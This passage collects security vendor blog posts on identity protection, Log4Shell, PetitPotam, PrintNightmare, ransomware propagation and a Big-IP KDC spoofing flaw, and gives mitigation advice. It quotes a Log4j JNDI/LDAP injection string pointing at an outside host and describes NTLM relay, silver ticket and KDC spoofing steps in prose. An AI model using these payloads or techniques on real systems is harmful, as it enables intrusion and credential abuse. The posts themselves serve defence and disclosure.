attacks that utilize compromised credentials to access targeted resources. This includes end-to-end MFA protection, as well as continuous monitoring of all authentications both on-prem and in the cloud. Learn more about Silverfort here. --- - Published: 2021-12-12 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/monitoring-for-log4j2-exploits-with-silverfort/ Apache Log4j is an open-source, Java-based logging utility widely used by enterprise applications. The security community recently discovered a new Log4jl vulnerability (CVE-2021-44228) that allows a remote attacker who controls log fields in some applications, to exploit Log4j for remotely executing code on a target application. For example, an attacker can cause an application to log a field that contains a string in the form ${jndi:}. If the attacker causes the application to log a string in the form ${jndi:}, the application will reach out to the url ldap://example. com/a to load an object. If the hacker controls example. com, the attacker can use this vulnerability to load an object of their choice to the application’s memory. This vulnerability has been compared to HeartBleed and ShellShock due to its wide impact. Most applications that use Java use log4j2 for logging, so a wide array of applications and systems in your environment may be impacted. There are multiple reports of mass usage of this vulnerability in the wild as well with a rapidly growing number of exploit variants; more than 60 of which appeared within 24 hours of the vulnerability’s initial disclosure. Silverfort has reviewed its code and found no vulnerable usage of log4j2 by the product. According to CloudFlare, the vulnerability is already being exploited in the wild, and attackers often use the username field to exploit this vulnerability. This makes sense because the username field is often logged for unsuccessful authentication requests. Silverfort monitors all authentication requests in the environment and can be used to audit for these Log4Shell exploits by reporting on the use of the "${jndi:" string in authentication requests. Security teams are advised to update their software as soon as possible as well as to check if their vulnerable servers might have been compromised prior to the patch. Questions? We’re always here for you. test --- - Published: 2021-11-28 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/bring-order-to-identities-while-transitioning-to-cloud/ Your enterprise is transitioning to a hybrid network. Maybe it already has. This is great news, but it also presents a challenge. Enterprises have traditionally used identity and access management (IAM) solutions to manage users and assets. These solutions can be very different for cloud and web-based apps, on-premise systems, privileged access and perimeter access. This situation leaves enterprises with a collection of disparate identity solutions that cannot talk with one another. The resulting multiple identity silos only solve one piece of the puzzle and deliver varying degrees of security control, visibility and user experience. Because there's no single standard for identity management systems to interoperate, no one has come up with a way of centralizing secure user authentication and resource access between all these IAM components. Until now. Silverfort has tackled this issue head-on by developing the only platform that can truly orchestrate identity and authentication management across hybrid-cloud environments. It’s based on a concept known as unified identity protection, which centralizes the protection of all human and machine identities within a single platform. Benefits of Silverfort’s solution include: Clear visibility into the behavior of users across hybrid networks. A consolidated audit trail that tracks activity across both on-premises networks and cloud environments provides better context and improved detection of anomalies and malicious behavior patterns. Extending modern Cloud IAM protections to legacy on-premises resources. Multi-Factor Authentication (MFA) makes it difficult for attackers to access protected resources even when they have stolen valid user credentials. But not all identity protection solutions offer this control. On-premises directories, for example, cannot offer this. But with Silverfort, any asset residing within the network can be secured with MFA. Applying conditional access and risk-based authentication policies using on-premises IAM directories. Until now, the types of capabilities available from modern Cloud IdPs have not been available for on-premise IAM directories. Today's threat landscape requires secure authentication and access both inside and outside the network perimeter to prevent compromise and data theft, which is one of the key elements of any zero trust security strategy. Providing a better user experience. A unified approach to IAM not only provides a consistent, less confusing experience but also means that users no longer have to authenticate multiple times, with a different sign-in method just because they're accessing resources that happen to be managed by different IAM solutions. As IAM and cybersecurity concerns grow with the shift to hybrid environments and remote workforces, it’s only a matter of time until organizations are compelled to confront this issue. By ensuring they have the means of unifying and enforcing policies holistically and consistently, organizations can transform chaos into order. This blog post is excerpted from an article written for Forbes. For the full article, click here. --- - Published: 2021-10-14 - Modified: 2024-07-10 - URL: https://www.silverfort.com/blog/solving-active-directory-protection-gap-with-mfa-for-rdp-psexec-and-powershell/ While transition to the cloud and digital transformation are continuously reshaping IT, Active Directory (AD) is a still a key component in the environment of almost every organization. The common assumption is that for the foreseeable future most organizations will maintain a mixed on-prem/cloud environment. This introduces a critical security gap because unlike the cloud, AD doesn’t natively support identity protection controls such as MFA, making it alarmingly exposed to an attack that utilizes compromised credentials to access targeted resources. While MFA does exist for local logins and RDP connections, it is absent from key access interfaces such as PsExec, PowerShell, and others that are extensively uses by threat actors in lateral movement and ransomware attacks. Silverfort’s Unified Identity Protection is the first solution that delivers complete MFA protection for Active Directory environments, eliminating the risk of compromised credentials and introducing cloud-level identity protection and MFA for on-prem environments. A Short MFA Recap – How Does it Work and for what Purpose? In its simplest form, authentication involves a user providing credentials and an identity provider that checks if the credentials match and based on the result, either allows or denies access to the requested resource. MFA acts as an additional step within this process – following the positive result of the credentials check, the user is required to provide additional proof of his/her identity. In that manner, even if the credentials become compromised, they do not suffice to render access, materially reducing the potential risk of such scenarios. So What is the Problem with MFA for Active Directory? Authentication Protocols that don’t Support MFA Since the core Active Directory authentication infrastructure was designed and built long before MFA even existed, there is no way to add the MFA step we’ve described earlier to the authentication process. This applies first and foremost to command-line based remote access interfaces such as PsExec, PowerShell PSEnter-Session, WMI. These interfaces are the tool of choice for system admins and helpdesk staff to resolve issues at remote machines – but also for attackers who seek to compromise the network through manual or automated lateral movement. Reliance on Agents and Proxies = Partial Coverage RDP stands out as a relatively secure remote authentication alternative since it does support the placing of MFA process within its authentication flow. However, in order to place this protection, one with either must install an MFA agent on each protected server or place a proxy in front of each network segment. This almost always results in partial coverage because agents are never deployed on 100% of the machines and proxies fail to hermetically cover networks that exceed the most basic topology. Silverfort MFA Protection for Active Directory The Silverfort Unified Identity Protection platform delivers end-to-end MFA to Active Directory environments, overcoming the gaps in traditional MFA application. Utilizing agentless and proxyless technology, Silverfort analyzes every Active Directory authentication request and if there is a need, pushes MFA notification to the requesting user. Only after successful verification does Silverfort instruct Active Directory to let the user access the requested resource. This process is completely agnostic to the access method, enabling Silverfort to extend MFA protection across the following: MFA for PowerShell PowerShell increasingly has become the tool of choice for system administration and includes various cmdlets and utilities for remote access. Unfortunately, its use in cyber attacks has risen in direct proportion. Silverfort enables its users to enforce MFA on PowerShell connections based on either rules or automated discovery of risk indicators. MFA for RDP Unlike its peers, RDP is not command-line based but enables direct interaction with the remote machines’ GUI. This expands its usage to a large portion of the non-technical members of organizations, especially in the COVID remote workforce era. While traditional MFA can be applied to RDP it is subject to the limitations of proxies and agents that we’ve described earlier, resulting almost always in partial coverage that leaves a gap for attackers to take advantage of. As opposed to this, Silverfort’s agentless and proxyless technology seamlessly enforces MFA on RDP connections in the environment to render end-to-end security. Cool, But Can Silverfort Deliver MFA to Other Access Methods in Active Directory Environments? The concept is simple – if the resource authenticates to Active Directory, Silverfort can enforce MFA. As simple as that. This holds true regardless of the access methods. We’ve dedicated space to PowerShell, MFA for PsExec and RDP since they are extremely common, but the same protection logic applies equally to any existing or future authentication vector that passes through Active Directory - WMI, database connections, on-prem application or any other. It is Time to Realize that MFA Protection for Active Directory is a Must Active Directory is here to stay. Cyberattacks thrive on the historic absence of active identity protection for Active Directory environment that in practice means that if your user accounts’ credentials get compromised, it’s game over. The good news is that we don’t have to accept this anymore – Silverfort makes MFA for Active Directory accessible, comprehensive and easy to deploy, making your organization resilient to cyberattacks as never before. Learn more about Silverfort: Agentless MFA Lateral movement protection for Active Directory Ransomware protection --- - Published: 2021-09-20 - Modified: 2024-07-10 - URL: https://www.silverfort.com/blog/ping-identity-silverfort-identity-centric-zero-trust/ Ping Identity and Silverfort have joined forces to introduce a new approach of Identity-centric Zero Trust security that enables Zero Trust access, offering both higher granularity in terms of risk analysis as well as relatively rapid and seamless implementation that does not require any IT infrastructure changes. This new offering accelerates your Zero Trust journey with policies that can be configured within minutes, enabling Ping Identity and Silverfort customers to materially increase the defenses of their hybrid cloud environments and reduce the risks of a cyberattack. What is Identity-Centric Zero Trust? Today’s enterprise environment includes multiple resources including physical servers, SaaS apps, cloud workloads, file shares, on-prem applications, etc. Identity-centric Zero Trust ensures the following criteria are met: All users are by default not trusted until they are properly authenticated. Once authenticated, user accounts are only authorized for the resource they requested access for. Authentication and authorization is continuous. Their risk is constantly being assessed in the background and their risk score/profile is being adjusted accordingly. For example, let’s assume that a remote user has connected remotely by authenticating to the enterprise VPN. Once inside the internal environment this user now attempts to access a file server. Identity-centric Zero Trust would evaluate this new access request and determine if it is allowed and would never assume that this user account is trusted based solely on their VPN access. Better Together: Ping Identity & Silverfort Ping Identity delivers intelligent identity solutions for the enterprise. We enable companies to achieve Identity-centric Zero Trust security and more personalized, streamlined user experiences. The PingOne Cloud Platform provides customers, workforce, and partners with access to cloud, mobile, SaaS and on-premises applications across the hybrid enterprise. Over 60% of the Fortune 100 choose us for our identity expertise, open standards, and partnerships with companies including Microsoft and Amazon. We provide flexible identity solutions that accelerate digital business initiatives, delight customers, and secure the enterprise through multi-factor authentication, single sign-on, access management, intelligent API security, directory, and data governance capabilities. For more information, visit www. pingidentity. com. The Silverfort Unified Identity Protection platform utilizes its agentless technology for continuous monitoring, risk analysis and secure access policies on all other resources in the enterprise environment, including core assets that could never have been protected by MFA before, such as legacy homegrown applications, on-prem servers, command line access interfaces and more. Together, Ping Identity and Silverfort provide real-time visibility and control over all authentications and access requests across every type of resource in enterprise environments. We provide the foundations for Identity-centric Zero Trust at scale and a major prerequisite for Zero Trust maturity – complete coverage of every user access to every resource. Details of the Integration Ping Identity streamlines all access requests to federated applications to Silverfort. This feed provides Silverfort’s risk engine with the full data of every user’s authentication and access attempt activity both on-prem and in the cloud. This data enables the risk engine to perform high-precision risk analysis to reveal the true context of each access attempt and determine whether to grant access, require MFA or deny it altogether. This is the complete Identity-centric Zero Trust flow delivered by Ping Identity and Silverfort: Continuous Monitoring: monitors all access requests, made by all user accounts to any type of on-prem or cloud resource, and creates a comprehensive audit trail. Risk Analysis: covers all individual access attempts, assesses the probability of a compromised attempt, based on analysis of the user behavior, the audit trail, and various contextual parameters. Enforcement of Real Time Access Policy: based on the calculated risk score and predefined policy access can either be granted, denied, or require step up authentication via MFA. The Business Value of the Integration Together, Ping Identity and Silverfort’s integration delivers the following benefits to the business: Simple and Easy Deployment: no infrastructure changes and related downtime are required. All the Zero Trust access policies are delivered by Silverfort on top of the existing identity infrastructure. High granularity: focus on the user versus the network ensures risk analysis is granular and carried out on every resource access request. Improved ability to detect anomalies and threats: By definition, an attacker's movement within the enterprise environment is anomalous in comparison to legitimate users. Performing security checks for each resource access increases the likelihood to detect and prevent malicious activity. Want to learn more? Schedule a demo with one of our experts Silverfort + Ping partnership page Ping Integration Directory listing --- - Published: 2021-08-19 - Modified: 2025-07-21 - URL: https://www.silverfort.com/blog/rethinking-ransomware-protection/ Ransomware has gradually evolved since it was first introduced in 2005. In 2013, ransomware attacks began to target the enterprise workforce rather than personal users, with more than 100k new variants in that year alone – a number that has only risen since. In 2017, for the first time, WannaCry and NoPetya attacks paired ransomware with automated propagation capabilities, shutting down operations of enterprises worldwide and causing approximately $15B in damages. Ransomware attacks can be divided into three stages: delivery of the ransomware payload to the target machine, execution of the payload to encrypt or delete data files on the machine, and propagation of the ransomware across multiple machines within the environment, to encrypt their data files as well. Traditional ransomware attacks operated in one-to-one mode. A compromise of a single machine resulted in data encryption on that machine only. Automated propagation enabled the attacker to exponentially increase their ROI: a compromise of a single machine is now the stepping-stone to compromising all servers and workstations in the environment. Translating ransomware breakdown to actual damage It is easily seen that the price of failure rises with each attack stage. The damage caused by a ransomware attack that succeeds in the Delivery and Execution stages is limited to a single or a few infected machines. Propagation is the X-factor that extends the ransomware damage across wide parts of the targeted organization’s infrastructure. Today, the typical enterprise ransomware protection stack includes security measures against the Delivery and Execution stages. However, most organizations do not have a solution in place for the propagation stage. This creates a significant security gap – if a ransomware attack bypasses the Delivery and Execution security controls it can propagate uninterrupted across the environment. Why is propagation a blind spot, and how can it be solved? In an enterprise environment, connecting from one machine to another involves the first machine providing Active Directory with a username and password. If these match, Active Directory approves the connection. Ransomware propagation is carried out by connecting to multiple machines with compromised admin credentials. Since these credentials are valid, Active Directory treats it as a legitimate authentication and grants the ransomware access. The Silverfort Unified Identity Protection platform integrates with all Identity Providers (IDP) in the environment to perform continuous monitoring, risk analysis, and adaptive access policies on all access attempts, made by all users, to all on-prem and cloud resources. In this way, access to resources is never granted based on credentials alone. Rather, Silverfort's risk analysis determines whether or not to allow access, augment the authentication with MFA verification, or block the access attempt altogether. The Silverfort Unified Identity Protection Platform Silverfort pioneered the first Unified Identity Protection Platform to protect enterprises against identity-based attacks that exploit compromised credentials to access enterprise resources. Using innovative agentless and proxyless technology, Silverfort natively integrates with all existing IAM solutions, to extend secure access controls such as Risk-Based Authentication and MFA across all on-prem and cloud resources. This includes assets that could never have been protected in this way before, such as homegrown/legacy applications, IT infrastructure, file systems, command-line tools, machine-to-machine access, and more. Silverfort continuously monitors all access attempts by users and service accounts, and analyzes risks in real-time using an AI-based engine to enforce adaptive access policies. Learn more about how the Silverfort Unified Identity Protection Platform prevents ransomware propagation here. --- - Published: 2021-07-27 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/silverfort-security-advisory-petitpotam-and-printer-bug/ The PetitPotam attack, published on GitHub, causes a remote server to authenticate to a target server with NTLM, using an MS-EFSRPC command called EfsRpcOpenFileRaw. MS-EFSRPC is a protocol that enables remote access to encrypted files. Causing a server to authenticate with NTLM remotely is bad, because it can be used to trigger NTLM relay attacks. A particularly dangerous NTLM relay attack is one that targets the Active Directory Certificate Services (AD CS). In a whitepaper (see ESC8), SpecterOps explain how to use an NTLM relay attack on AD CS to take over a machine or impersonate that machine. To impersonate the machine, a client certificate is requested by the machine.  Having obtained the client certificate, the attacker can then use one of the following techniques to take over the domain or the target machine: If the machine is a domain controller or another privileged computer, it can use the credentials to sync secrets from the directory, effectively compromising the domain. The attacker can use the S4U2Self protocol to get a service ticket to the target machine as any user. The attacker can use PKInit to obtain the machine NT hash, and then run a silver ticket attack. The Printer Bug This vulnerability is related but different from the Printer Bug (presented in DerbyCon 2018 by Will Schroeder). This vulnerability allows an attacker to trigger an NTLM authentication by any client running the PrinterSpooler service. The mitigations provided below will prevent both PetitPotam and the Printer Bug from performing NTLM relay to the AD CS server but will not block an NTLM relay attack to a different target. Since there have been multiple Printer Spooler vulnerabilities published lately, we recommend disabling the Printer Spooler on all member servers and domain controllers that do not need printing. Microsoft Guidance Microsoft will not fix this vulnerability, but are advising several possible mitigations. The preferred mitigation is pretty extreme - to completely disable NTLM in the domain.  In my experience, that's not practical advice, NTLM usually takes up two-digit percent of all authentication in the network. Reducing this to zero is usually impractical. The other mitigation they recommend is to restrict incoming NTLM traffic into the AD CS server. If restricting NTLM to the entire server is too harsh, Microsoft instructs how to disable NTLM for the "Certificate Authority Web Enrollment" or "Certificate Enrollment Web Service" services at the IIS level. As a last resort, Microsoft recommends enabling EPA for AD CS. Silverfort Guidance The tricky part about Microsoft's recommendation is to choose the mitigation that's right for your environment. We recommend the following for Silverfort customers: List all AD CS servers in your domain – we recommend looking specifically at the Cert Publishers security group to find a list of suspected AD CS servers.  For each, filter the Silverfort log for NTLM authentication to that server. If there is no NTLM authentication to any of the AD CS servers, disable NTLM into the AD CS servers. Otherwise, follow Microsoft's instructions for enabling EPA for AD CS. --- - Published: 2021-07-01 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/silverfort-proactively-prevents-exploitation-of-printnightmare-vulnerability/ A vulnerability in Windows Print Spooler could allow for remote code execution as “System” by authenticated domain users on Windows systems. Details and proof-of-concept for the vulnerability have been leaked on the internet. The vulnerability is being called "PrintNightmare. " Print Spooler, which is turned on by default in Microsoft Windows, is a Windows service that is responsible for managing all print jobs sent to the computer printer or print servers. Successful exploitation of this vulnerability could open the door to complete system takeover by remote adversaries. A remote, authenticated attacker could run code with elevated rights on a machine with the Print Spooler service enabled. When Microsoft released an advisory about a similar vulnerability in the Print Spooler (CVE-2021-1675), security researchers accidently released details of PrintNightmare (CVE-2021-34527). An attacker can exploit this vulnerability to take control of an affected system. Silverfort Protection Against PrintNightmare Exploitation Silverfort's Unified Identity Protection can deliver full protection against such exploits with a simple risk-based authentication policy, applied to systems running the Print Spooler service. In this manner, any malicious access attempt access attempt by adversaries will trigger an MFA notification to the actual compromised user, which in practice would eliminate the possibility of leveraging this vulnerability to gain access into additional resources. Silverfort's solution can enforce modern secure access controls such as MFA on common access interfaces in Active Directory environment, materially increasing their resilience to identity-attacks that utilize compromised credentials to access enterprise resources. “Silverfort’s ability to enforce modern secure access controls such as MFA on common access interfaces in Active Directory environment is a game changer,” said Yaron Kassner, Co-Founder and CTO of Silverfort. “Nearly all post-exploitation TTPs rely on the assumption that their targets lack the ability to prevent malicious authentications in real time. The PrintNightmare exploit is another great example of the security gap we’re addressing. ” Silverfort Security Guidance  Reduce the Attack Surface Scan on all machines in your environment to check where Windows Print spooler service is enabled. You can start by scanning your domain controllers with Silverfort's free Vulnerability Assessment tool. Disable the Windows Print spooler service in Domain Controllers and other systems that do not print. Disable inbound remote printing from computers that do print, but are not accessed remotely for printing. Reduce membership as much as possible to the groups indicated in Microsoft’s guidance (see the Mitigations Section). Disable inbound remote connections in all machines accept printing servers. Create a Risk-Based Policy Assign a risk-based access policy that enforces MFA on any NTLM connection to machines where Windows Print spooler service is enabled. After you follow the guidance above, this should be limited to printing servers. Create a policy for any user with risk score ‘Medium’ and above. The published exploits of PrintNightmare use a pass-the-hash attack on NTLM for connections, so this policy would block high-risk access by any attacker attempting to exploit the vulnerability to access target resources. This is what the policy would look like: In the Advanced Settings, configure the policy to require MFA every 12 hours: To defend against alterations of these exploits, you can also create a policy for CIFS Kerberos tickets. Want to learn more? Schedule a demo with one of our experts. --- - Published: 2021-06-29 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/prevent-automated-propagation-of-ransomware-attacks/ Ransomware attacks rank high among enterprises’ cybersecurity concerns. The common practice today is to protect against the delivery and execution stages of these attacks. However, nearly all enterprises lack the ability to proactively prevent the automated propagation of ransomware payload that has managed to bypass the delivery and execution protection. Since this propagation is the difference between a single infected endpoint and a mass enterprise lockdown, lacking the ability to prevent this is a critical security gap. Silverfort’s Unified Identity Protection platform delivers the only solution today that can utilize MFA to effectively prevent automated ransomware propagation, never allowing the malicious payload to expand beyond the initially infected machine. Automated Propagation is the X Factor in Ransomware Attacks Ransomware attacks transformed from a nuisance to a critical risk in 2017, when the WannaCry and NotPetya attacks wreaked havoc among enterprises across the globe, with overall estimated damages of close to $15B. These attacks were the first to couple an encryption payload with automated propagation. In this manner, social engineering a single enterprise worker to open a weaponized email resulted in data encryption of not only this worker’s endpoint alone, but all other machines in the enterprise environment. This new reality forced enterprise security decision makers to reprioritize their security needs, pushing enterprise ransomware protection to the top of their list. Ransomware Attack Anatomy: Delivery, Execution, Propagation Ransomware attacks comprise the following consecutive stages: Delivery Protection - Checked The purpose of the delivery stage is to place the ransomware payload on the target’s machine. There are various methods for attackers to achieve this with weaponized phishing emails, compromised RDP access, and watering holes leading the list. The table below, taken from Statista website, shows a more detailed distribution of delivery vectors: Protection against ransomware delivery is carried out by email security gateways that scan emails to detect and remove risky content prior to user interaction, endpoint protection platforms that prevent the download of potential malware, and MFA on RDP connections which prevents attackers’ ability to connect with compromised credentials. Execution Protection – Checked The Execution stage is when the ransomware payload that was successfully delivered to the workstation or server starts running with the intent to encrypt the data files on the machine. This table, assembled by Kaspersky Labs, shows the top-performing ransomware families: Enterprises protect against the Execution stage by deploying Endpoint Protection Platforms (EPP) on their workstations and servers. The EPP aims to terminate the execution of any process that detects as ransomware, preventing the malicious encryption altogether. Propagation Protection – The Blind Spot! The propagation stage is where the ransomware payload is copied to many other machines in the enterprise environment via malicious authentication with compromised credentials. One of the most vulnerable attack surfaces are shared folders. In an enterprise environment every user has access to at least some of them, paving the way for ransomware to propagate. As we have explained before, this is the stage where the mass damage is caused. However, this stage today is a blind spot in enterprises’ security posture. There is no security solution today that is capable of preventing automated ransomware propagation in real time. In practice, it means that if a ransomware variant succeeds in bypassing the Delivery and Execution security measures – and a certain percentage if these variants always do – it can propagate within the enterprise environment, encrypting any machine it can reach. And while EPPs are getting better at protecting against new strains of malware, threat actors are crafting more evasive and stealthy payloads – making such bypass a high-probability scenario. What is the Challenge in Protecting Against Automated Ransomware Propagation? To better understand the root cause of this security gap, let’s examine how automated ransomware propagation works. We have the patient-zero endpoint where the ransomware payload was initially executed. In order to propagate to other machines in the environment, the malware will use compromised credentials and perform a standard authentication – providing the other machine a valid (yet compromised) username and credentials. While this activity is 100% malicious within its context, in essence it is identical to any legitimate authentication in the environment. There is no way for the Identity Provider – Active Directory in this case – to identify this malicious context and it will approve the connection. So here is the blind spot in ransomware protection – on the one hand, no security product can block authentications in real time, and on the other, the only product that can do it – the Identity Provider – doesn’t have the ability to discern between legitimate authentications and malicious ones. This is where Silverfort Unified Identity Protection platform comes into play. The Solution: Unified Identity Protection Platform Silverfort has pioneered the first purpose-built Unified Identity Protection platform that proactively prevents attacks that utilize compromised credentials to access enterprise resources. Silverfort utilizes innovative, agentless technology to natively integrate with the Identity Providers in the enterprise environment to apply continuous monitoring, risk analysis and access policy enforcement on each and every access attempt to any on-prem and cloud resource. In this way, Silverfort extends Risk Based Authentication and MFA to resources and access interfaces that could have never been protected before – including Active Directory command line remote access interfaces upon which automated ransomware propagation relies. So How Does Silverfort Deliver Real Time Protection Against Automated Ransomware Propagation? As we’ve explained earlier, automated propagation utilizes authentication with compromised credentials to spread in the targeted environment with a special inclination towards shared folders. Let’s understand how Silverfort addresses this risk: Continuous Monitoring Silverfort continuously analyzes user accounts’ authentications and access attempts, building up a high-precision behavior profile of both users’ and machines’ normal activities. Risk Analysis In the case of automated propagation, there will be multiple simultaneous login attempts originating from a single machine and user account. Silverfort’s risk engine will immediately identity this anomalous behavior and increase both the user account’s and machine’s risk score. Access Policy Enforcement Silverfort enables users to create access policies that utilize its real-time risk score to trigger a protective action – stepping up authentication with MFA or even blocking the access altogether. The policy against automated ransomware propagation would require MFA wherever a user account’s risk score is either ‘High’ or ‘Critical’, and would apply to all access interfaces – Powershell, CMD and CIFS, which is the dedicated protocol for providing shared access to network folders. With this policy enabled, whenever the ransomware attempts to expand to another machine, the connection would not be permitted without MFA verification of the actual users whose credentials were compromised. Effectively, it means that the propagation would be prevented, and the attack would be contained to the single, patient-zero endpoint. Conclusion: It Takes a Dedicated Identity Protection Approach to Prevent Automated Propagation Automated propagation is the most lethal component in ransomware attacks and is the key game changer in the risk they introduce to enterprises today. With Silverfort’s Unified Identity Protection platform you can finally have this critical blind spot covered and checked, materially increasing your enterprise’s resilience to attempted ransomware attacks. --- - Published: 2021-06-03 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/three-reasons-private-sector-should-notice-cybersecurity-eo/ The recent Executive Order, signed by President Biden in May 2021, is a response to a series of high-profile cyberattacks on targets such as SolarWinds, Microsoft Exchange, and most recently, the Colonial Pipeline. Realizing that information-sharing and stronger cybersecurity standards are critical to maintaining a strong defense in an evolving threat environment, the federal government has mandated measures to implement security best practices. What Changed? Without public trust in the nation’s digital infrastructure, the engines of global commerce and government services are at risk. This executive order has addressed the issue not with a generalized call to improve security, but rather specific technologies that once implemented, stand the best chance of preventing future attacks. To encourage this tightening of security, the US government is stepping forward to "lead by example" by adopting these measures throughout the public sector. To maximize this initiative’s impact, however, this Executive Order calls on both the public and private sector to reach a standardized technological baseline that will enable coordination in reporting incidents and preventing threats. This also means that security measures once thought of as nice-to-have roadmap features will now need to be implemented with far greater urgency. hbspt. cta. load(4711332, '5e755198-e192-4044-b11c-5856c24a654f', {"region":"na1"}); Three Things you Need to Know If you work with or plan to work with the federal sector, you’ll need to be compliant Standards implemented at the federal level will become the baseline for what is considered a strong cybersecurity posture throughout the private sector. In fact, the Executive Order explicitly states that the “private sector must adapt to the continuously changing threat environment, ensure its products are built and operate securely, and partner with the Federal Government to foster a more secure cyberspace. ” Specifically, the field-tested building blocks of identity protection – multi-factor, risk-based authentication and conditional access – will become a standard, both for networks in the federal domain and those vendors with whom the US government contracts for services. Security is a major barrier for adoption of cloud technologies The Executive Order mandates “accelerating movement to secure cloud services”. Full network protection, however, requires uniform security capabilities not only on cloud services but also on the on-premise assets that often comprise part of a hybrid network. Typically, a hybrid network has multiple IAM products, each managed separately and offering varying levels of security. Consolidating these security products across all resources and access attempts is essential for identifying and managing cybersecurity risks. With a unified identity protection framework in place, assets can be migrated to the cloud with full confidence that they will remain secure. Zero Trust approaches are becoming a new standard Developing a plan to implement Zero Trust Architecture is mandated by this Executive Order, so this stance is quickly moving from concept to reality. Until today, the prevalent approach was Zero Trust Network Access (ZTNA), which focuses on the device and the network segment it’s attempting to access. This can be difficult to implement in enterprise environments without needing to rebuild networks. Another approach that is gaining interest these days is an Identity-Based Zero Trust approach, which considers the user’s identity and behavior profile to determine the risk level and applies dynamic, risk-based access controls. Each access attempt is evaluated individually; a user’s identity is never fully trusted until they prove they are indeed who they claim to be. --- - Published: 2021-04-29 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/silverfort-researchers-discover-kdc-spoofing-vulnerability-in-f5-big-ip-cve-2021-23008/ Last year we reported three Key Distribution Center (KDC) spoofing vulnerabilities in Cisco ASA, Palo Alto Networks PAN-OS and IBM QRadar. We did mention another one was coming, and now that F5 has issued a fix, we’re publishing the fourth KDC spoofing vulnerability we’ve identified – this time in Big-IP. The KDC Spoofing vulnerability allows an attacker to bypass the Kerberos authentication to Big-IP Access Policy Manager, bypass security policies and gain unfettered access to sensitive workloads. In some cases this can be used to bypass authentication to the Big-IP admin console as well. We have been working closely with F5 engineers to help fix this issue, resulting in the recently issued advisory. This blog post outlines the vulnerability, explains how to avoid these flaws when implementing Kerberos, and discusses mitigation steps for customers using Big-IP and other Kerberos-based systems. Explaining the Vulnerability F5 Big-IP Application Delivery Services is a solution that delivers applications in a secure and scalable manner. One of its core components is Access Policy Manager (APM), which manages and enforces policies to ensure access is properly authenticated and authorized. APM is sometimes also used to protect access to the Big-IP admin console. The vulnerability lies in F5’s implementation of the Kerberos protocol. Kerberos is the most common authentication protocol for on-premise authentication. It is widely used in corporate networks due to the popularity of Active Directory, and it is preferred over weaker authentication protocols such as NTLM. Kerberos can be used as an authentication protocol for authentication required by an APM policy. When a user accesses an application through Big-IP, they may be presented with a captive portal and required to enter a username and password. The username and password are verified against AD with the Kerberos protocol to ensure the user is who they claim they are. Therefore, bypassing Kerberos authentication allows an attacker to gain access to Big-IP applications, without having legitimate credentials. For the Kerberos protocol to work, three things should happen: The user authenticates to the server The server authenticates to the client The KDC authenticates to the server Apparently, KDC authentication to the server is often overlooked. Perhaps because requiring it complicates configuration requirements. However, if the KDC does not authenticate to the server, the security of the protocol is entirely compromised, allowing an attacker that hijacked network traffic to authenticate to Big-IP with any password, even an invalid one. For Kerberos terminology and background about how a KDC spoofing attack works, see the end of this blog post. Below is a screenshot of the instructions for configuring AD authentication for an access policy, taken from the F5 website. After this configuration, when a user attempts to authenticate to an app sitting behind the proxy, the user is challenged to enter a username and password. When the user enters their password, the product uses Kerberos to authenticate to the domain controller (DC). However, APM does not request a service ticket and grants access based on a successful AS_REP. Unlike with other scenarios, F5 lets you configure an admin username and password. Theoretically, this password could be used to authenticate the DC and prevent the vulnerability. However, it is not used for these purposes, but only for the purpose of fetching primary or nested groups, prompting the user for a password change, or performing a complexity check or a password reset. Spoofing Kerberos authentication Here are the steps an attacker can take to spoof a DC to bypass this kind of authentication. Let’s assume that we have the ability to hijack the network communication between Big-IP and the DC. In this case, we can create a fake DC with a username identical to the admin’s username and a password of our choice. Then we initiate an authentication to Big-IP and use the user and password we chose. Big-IP authenticates with Kerberos, and we hijack the Kerberos communication and return an AS_REP that corresponds to the password we chose; and a TGS_REP that consists of a service ticket, encrypted with a service session key of our choice, and a session key of our choice, encrypted with the password that we chose. Since at these phases the only verification that is done on the Big-IP side relies on the password we chose, Big-IP will allow the authentication. Exploitation We simulated an attack by redirecting the traffic between Big-IP and the KDC (in this case a domain controller) on port 88 (the Kerberos port) to our own Windows Server. We set up a fake domain on the windows server and made sure there is a user with the same UPN as the Big-IP administrator in the real domain. We configured that user’s password to be “1” in the fake domain. We then tried the following scenarios: Regular login (Traffic not diverted) – we managed to login with the user’s original password, as expected. When trying the password “1”, the login failed. Logging in with the traffic diverted to our fake DC – logging in with the administrator’s original password failed, but logging in with the password “1” worked. Prevention and Mitigation Mitigation Steps for Security Professionals Upgrade your Big-IP to a fixed version If a fixed version is not available for the version of Big-IP you are using, make sure MFA is enabled. Update your Silverfort policy for Big-IP accordingly Continuously monitor your Kerberos authentication. Look for resources that request only AS_REQ. If there are no TGS_REQs, it’s a red flag. Use Silverfort’s open source tool to search the authentication logs for services that don’t request service tickets. See developer recommendations for any internally developed applications that implement Kerberos and systems you configured yourself. For Developers We recommend a few steps to make sure that your solution is not susceptible to KDC spoofing: Validate that the implementation of Kerberos requires a password or keytab: To validate the DC, you need to use some kind of shared secret. If your solution does not enable configuring a keytab file, or a service account password, the application is surely susceptible to KDC spoofing. Run Wireshark – use Wireshark to see what Kerberos requests are sent during authentication. If there is no TGS_REQ, this is a red flag. If you want to implement an authentication protocol yourself, you must follow the protocol specification diligently. We recommend taking the easier route and using an existing implementation of these protocols. Use 3rd party libraries properly – some 3rd party libraries require specific configuration to avoid KDC spoofing. For example, a common library used for Kerberos called pam-krb5, has to have a keytab configured to work properly. Here is the relevant paragraph from their documentation (https://github. com/rra/pam-krb5/blob/master/README. md) What’s Next? I am sure this is the last KDC spoofing vulnerability we will ever encounter. Background An overview of the Kerberos Protocol The Kerberos authentication protocol was developed in the 1980s by Steve Miller and Clifford Neuman. It allows Single Sign-On (SSO) in a managed network and its Active Directory (AD) implementation has turned it into the primary authentication protocol for on-premises enterprise environments. The protocol consists of three exchanges to provide mutual authentication for the user and the server accessed. When the user logs in, they enter their credentials and the Authentication Service (AS) exchange takes place. The user gets a Ticket Granting Ticket (TGT), which is later used to obtain tickets to specific services during the Ticket Granting Service (TGS) Exchange. The ticket is then used during the Client/Server Exchange to complete the authentication: 1. Authentication Service (AS) Exchange During the AS exchange the user authenticates with the Key Distribution Center (KDC). In return, 